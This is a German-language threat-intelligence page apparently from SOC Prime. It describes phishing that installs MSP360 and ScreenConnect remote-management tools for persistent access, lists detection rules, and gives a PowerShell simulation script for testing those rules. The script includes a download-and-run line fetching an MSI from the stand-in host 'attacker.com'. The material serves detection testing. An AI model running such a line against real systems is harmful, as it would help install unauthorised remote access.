SOC Prime Bias: High

01 Oct 2026 08:13 UTC

Phishing Missbraucht RMM-Tools für Persistenten Zugang

Author Photo
SOC Prime Team linkedin icon Folgen
Phishing Missbraucht RMM-Tools für Persistenten Zugang
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure nutzen Phishing-Kampagnen, um ein legitimes MSP360 RMM-Installationsprogramm als vertrauenswürdige Software getarnt auszuliefern. Nach dem Start stellt der Installer Persistenz her und lädt anschließend ConnectWise ScreenConnect herunter und stellt es bereit, wodurch Angreifer einen zusätzlichen Fernzugriffskanal erhalten. Dies ermöglicht weitere Aktivitäten nach der Kompromittierung, einschließlich Credential-Diebstahl und Sammlung sensibler Daten.

Untersuchung

Microsoft Defender-Experten identifizierten mehrere Phishing-Köder, die Zoom, Adobe und legitime Besprechungseinladungen imitieren, um MSP360 v2.5.0.67 zu verteilen. Forscher rekonstruierten die Infektionskette, indem sie die anfängliche Benutzerausführung und UAC-Erhöhung durch Serviceinstallation und Bereitstellung sekundärer RMM-Tools nachverfolgten. Die Untersuchung ergab auch, dass Angreifer vertrauenswürdige Cloud-Plattformen wie Amazon S3 und Dropbox missbrauchen, um bösartige Payloans zu hosten.

Abschwächung

Organisationen sollten genehmigte RMM-Tools streng durchsetzen, indem sie MFA einsetzen und Anwendungssteuerungsrichtlinien implementieren, um unbefugte Installationen zu verhindern. Zertifikatbasierte Sperrregeln können weiterhin bestimmte signierte Anwendungen einschränken. Die Verstärkung der Endpunktsicherheit durch cloud-gelieferte Antiviren-Schutzmaßnahmen und Regeln zur Reduzierung der Angriffsoberfläche ist ebenfalls unerlässlich, um das Expositionsrisiko zu verringern.

Reaktion

Wenn unbefugte RMM-Installationen entdeckt werden, sollten Sicherheitsteams sofort die Anmeldeinformationen im Zusammenhang mit den betroffenen Dienstinstallationen zurücksetzen. Ein vermuteter Systemkompromiss erfordert eine umfassende Untersuchung, um den gesamten Angriffsumfang zu bestimmen. Endpunkt-Detektionsprotokolle sollten überprüft werden, um verdächtige Remote-Management-Sitzungen und damit verbundene Aktivitäten nach der Kompromittierung zu identifizieren.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Herunterladen oder Hochladen über Powershell (via cmdline)

SOC Prime Team
30. Sep 2026

Ungewöhnliche Code Page Ausführungsänderung (via cmdline)

SOC Prime Team
30. Sep 2026

Alternative Fernzugriffs-/Managementsoftware (via process_creation)

SOC Prime Team
30. Sep 2026

Aufruf verdächtiger .NET-Methoden von Powershell (via powershell)

SOC Prime Team
30. Sep 2026

Verdächtige Befehls- und Kontrollanfrage durch DNS-Anfrage an ungewöhnliche Top-Level-Domain (TLD) (via dns)

SOC Prime Team
30. Sep 2026

IOCs (HashSha256) zu erkennen: Phishing missbraucht RMM-Tools für persistenten Zugriff

SOC Prime AI-Regeln
30. Sep 2026

IOCs (HashSha1) zu erkennen: Phishing missbraucht RMM-Tools für persistenten Zugriff

SOC Prime AI-Regeln
30. Sep 2026

Erkenne PowerShell Invoke-WebRequest für den Remote-Download von MSI-Paketen [Windows PowerShell]

SOC Prime AI-Regeln
30. Sep 2026

Phishing missbraucht RMM-Tools für persistenten Zugriff [Windows Prozess Erstellung]

SOC Prime AI-Regeln
30. Sep 2026

Simulationausführung

  • Angriffsgeschichte & Befehle: Ein Angreifer startet eine Spearphishing-Kampagne. Das Opfer klickt auf einen Link, der ein PowerShell-Einzeilenbefehl auslöst. Dieser Befehl verwendet Invoke-WebRequest zum Herunterladen von ClientSetup.msi (Simulation des ScreenConnect-Installers) von einem Remote-Server. Nachdem es heruntergeladen wurde, führt der Angreifer das MSI aus, und der letzte Schritt der Simulation beinhaltet das Starten von ScreenConnect.WindowsClient.exe um die etablierte Fernzugriffssitzung nachzuahmen. Diese Sequenz soll die Auswahl_2 UND Auswahl_3 Logik der Regel auslösen.

  • Regressionstest-Skript:

    # Simulation des Phishing-basierten RMM-Deployments
    $tempDir = $env:TEMP
    $msiName = "ClientSetup.msi"
    $exeName = "ScreenConnect.WindowsClient.exe"
    $msiPath = Join-Path $tempDir $msiName
    $exePath = Join-Path $tempDir $exeName
    
    # 1. Simuliere den PowerShell-Download (Auswahl 2 Teil A)
    Write-Host "[+] Simulation des PowerShell-Downloads des MSI..."
    # Verwendung einer Dummy-Datei zur Simulation des MSI-Downloads
    New-Item -Path $msiPath -ItemType File -Force
    
    # Dieser Befehl entspricht der 'Invoke-WebRequest'- und 'ClientSetup.msi'-Logik der Regel
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'"
    
    # 2. Erstelle eine Dummy-Ausführungsdatei zur Simulation des ScreenConnect-Clients (Auswahl 3)
    Write-Host "[+] Erstellen einer Dummy-ScreenConnect-Ausführungsdatei..."
    New-Item -Path $exePath -ItemType File -Force
    
    # 3. Führe den Client aus (Auswahl 3 und Abschluss von Auswahl 2)
    Write-Host "[+] Ausführen des ScreenConnect Clients..."
    Start-Process -FilePath $exePath
  • Bereinigungskommandos:

    # Bereinigen von Simulationsartefakten
    Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "[+] Bereinigung abgeschlossen."